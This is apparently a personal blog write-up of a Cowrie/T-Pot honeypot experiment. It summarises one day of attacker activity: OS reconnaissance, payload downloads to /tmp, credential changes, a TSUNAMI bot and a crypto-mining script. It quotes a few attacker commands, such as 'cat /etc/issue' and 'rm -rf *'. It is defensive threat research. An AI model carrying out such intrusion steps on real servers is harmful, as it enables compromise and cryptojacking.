Honey Pot: Crypto Miner
Every computer, hardware, software, network on the surface of the earth is always at risk of being attacked regardless of any existing vulnerabilities or not. Many take security precautions to stop any attacks with help of IPS or detect any sort of attacks through IDS and some would create weak networks or networks in general and set up honeypots to test and study the threat actors and their creative ways to compromise cyberspace. For this reason, I have used honey pot to see what techniques the hackers use to compromise the said cyberspace. Telekom Security’s honeypot “Tpotce” provides me with everything that I need to do a thorough threat intelligence and it comes with 19 different honeypots and uses ELK stack to visualize all the data it collects and spiderfoot to automate the OSINT process. With the help of Cowrie honeypot, I looked at a whole day’s worth of traffic to my honeypot to see any attack pattern and in the end, I will perform in-depth malware analysis on the crypto mining script the attacker had left on my honeypot.
Since the purpose of a honeypot is to lure in the attackers so that we can dissect their methods and use the collected data to protect our networks in the best ways possible, so at first, I wanted to take a look at how the attackers are trying to get in and if they got then what are they doing, what commands or searches are done, etc. Data shows some attackers would do reconnaissance on the operating system and architecture once they access the honeypot. I took a look at the specific commands they would run and for this specific timeframe, most would try to upload malicious payloads. For my selected period from October 18th, 2021 @ 17:30 to October 19th, 2021 @ 17:00, some of the attacks looked very similar, some coming from the same websites even though their geographic location and their IPs are different. Below are the commands run by some attackers, their IP, location, and how some of them correlate with one another.
According to the data collected from the Cowrie honeypot, geographic location indicates the attackers in the chart above are separate threat actors but if we look at the first of them, FranTech Solutions, two different IP addresses from two different geographical locations using two separate commands to get results, could be two separate attackers just using FranTech to throw off any trace. One of them is trying to download some sort of payload into the /tmp directory but failed to execute the downloaded file and the other one successfully downloaded some sort of crypto mining script onto the honeypot server. If we further analyze the attacks, third and fourth, UAB Host Baltic and Anton Mamaev, we notice that they both used the same command to begin their attack to act as a superuser but the third one carries on to use a few more commands to make sure that the server can not be accessed with its original user credentials. Lastly, for the second one, we can say that the attacker is using busybox to run TSUNAMI, executable malware to gather sensitive information on devices connected to the network and turn the infected system into a bot.
I wanted to download and analyze a few of the malware and the commands done on the honeypot. I noticed the first attacker, hosted by FranTech Solutions with different IPs were downloading their payloads from different URLs (See table: Few of the consistent attackers)
If we break down the commands from the first attack from FranTech Solutions, we can see that the attacker first checks the OS by typing “cat /etc/issue” then they change directory to /tmp and download the malware but fails to execute it properly without “rm -rf *” at last to finish the process.
When I navigated to the second URL I noticed that this was a script for a Cryptocurrency Miner as we can see in the screenshot below.
I notice the attacker downloads the mining script onto the honeypot. We assumed this is a wallet address because in the script there is a length check named WALLET_BASE and it checks whether the length equals 106 or 95.
Although the commands between these two IP addresses are not similar but both seem to have FranTech Solutions in common, we cannot know for certain if the attacks are coming from the same person without more data because one of them seems to have failed to execute while the other one was successful.
In conclusion, my honeypot was able to gather and monitor attacks and log all the inputs, furthering my understanding of various attack techniques and malicious files used in attempts to exploit my honeypot.
